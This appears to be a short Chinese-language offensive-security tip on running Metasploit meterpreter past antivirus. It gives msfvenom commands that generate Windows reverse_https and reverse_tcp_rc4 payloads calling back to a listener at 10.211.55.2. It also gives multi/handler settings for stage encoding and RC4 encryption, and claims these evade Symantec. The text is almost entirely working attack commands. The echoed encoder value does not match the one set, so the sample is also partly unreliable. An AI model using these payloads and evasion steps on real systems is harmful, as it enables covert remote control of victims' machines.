這是green-m大佬提到的一種方式,使用reverse_https等payload時可以使用下列方法bypass部分殺軟。
生成payload:
msfvenom -p windows/meterpreter/reverse_https lhost=10.211.55.2 lport=3333 -f c
在msf中進行如下設置,將控制端向被控制端發送的stage進行編碼
msf exploit(multi/handler) > set EnableStageEncoding true //嘗試使用不同的編碼器對stage進行編碼,可能繞過部分殺軟的查殺 EnableStageEncoding => true msf exploit(multi/handler) > set stageencoder x86/fnstenv_mov Stageencoder => x64/xor msf exploit(multi/handler) > set stageencodingfallback false stageencodingfallback => false
同樣,使用reverse_tcp_rc4也有同樣的效果,而且不能設置stageencoder選項,更穩定更方便。
msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=10.211.55.2 lport=3333 RC4PASSWORD=tidesec -f c
利用rc4對傳輸的數據進行加密,密鑰在生成時指定,在監聽的服務端設置相同的密鑰。就可以在symantec眼皮下執行meterpreter。